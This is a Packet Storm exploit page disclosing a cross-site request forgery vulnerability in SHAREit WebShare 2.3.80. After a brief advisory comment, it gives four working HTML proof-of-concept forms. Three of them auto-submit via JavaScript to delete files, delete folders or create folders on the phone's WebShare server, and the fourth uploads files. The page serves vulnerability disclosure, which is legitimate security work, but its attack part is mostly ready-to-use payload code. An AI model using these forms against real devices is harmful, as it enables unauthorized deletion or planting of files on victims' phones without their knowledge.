what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SHAREit WebShare 2.3.80 Cross Site Request Forgery

SHAREit WebShare 2.3.80 Cross Site Request Forgery
Posted Nov 20, 2015
Authored by Mahdi.Hidden

SHAREit WebShare version 2.3.80 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 490d8d74a088ae1e4e4d195dd7241004c00b9d1b1902cad5c9bccb3ab6cd3669

SHAREit WebShare 2.3.80 Cross Site Request Forgery

Change Mirror Download
<!--

Exploit Title: SHAREit WebShare Cross Site Request Forgery
Vendor Home Page: http://shareit.lenovo.com
Software Link: http://shareit.lenovo.com/download.html
Version: 2.3.80
Tested On: IOS 9.1, Windows 7
Date: 19 Nov. 2015

Researcher: Mahdi.Hidden

POC:

There is a CSRF vulnerability in SHAREit last version in WebShare section.
For test it open the application on your phone and go to "WebShare".
Afterwards, the application will give you the URL of WebShare. (For
example: http://192.168.1.2)
You will see the page which lets you transferring file between PC and Phone.
You can Make Folder, Upload File, Delete File, Delete Folder and ... but
there is no security token for prevent CSRF.
This vulnerability allows you to Delete File, Delete Folder and ... .
There is some exploit for doing this.
-->

<!-- Delete File -->

<form action="[Host]/delete" method="post" name="csrf"> (Ex.
http://192.168.1.2)
<input type="hidden" name="path" value="/[Path]/[File]"> (Ex.
/folder/image.jpg)
</form>
<script language="javascript">
setTimeout(csrf.submit(),1);
</script>


<!-- Delete Folder -->

<form action="[Host]/delete" method="post" name="csrf"> (Ex.
http://192.168.1.2)
<input type="hidden" name="path" value="/[Path]/"> (Ex. /folder/)
</form>
<script language="javascript">
setTimeout(csrf.submit(),1);
</script>

<!-- Add Folder -->

<form action="[Host]/create" method="post" name="csrf"> (Ex.
http://192.168.1.2)
<input type="hidden" name="path" value="/[Path]"> (Ex. /folder/image.jpg)
</form>
<script language="javascript">
setTimeout(csrf.submit(),1);
</script>

<!-- Upload File -->

<form action="http://192.168.1.4/upload" method="post"
enctype="multipart/form-data"> (Ex. http://192.168.1.2)
<input type="file" name="files[]" multiple>
<input type="hidden" name="path" value="[Path]">
<input type="submit">
</form>

<!--

# Mahdi.Hidden
# Ashiyane Digital Security Team

-->
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close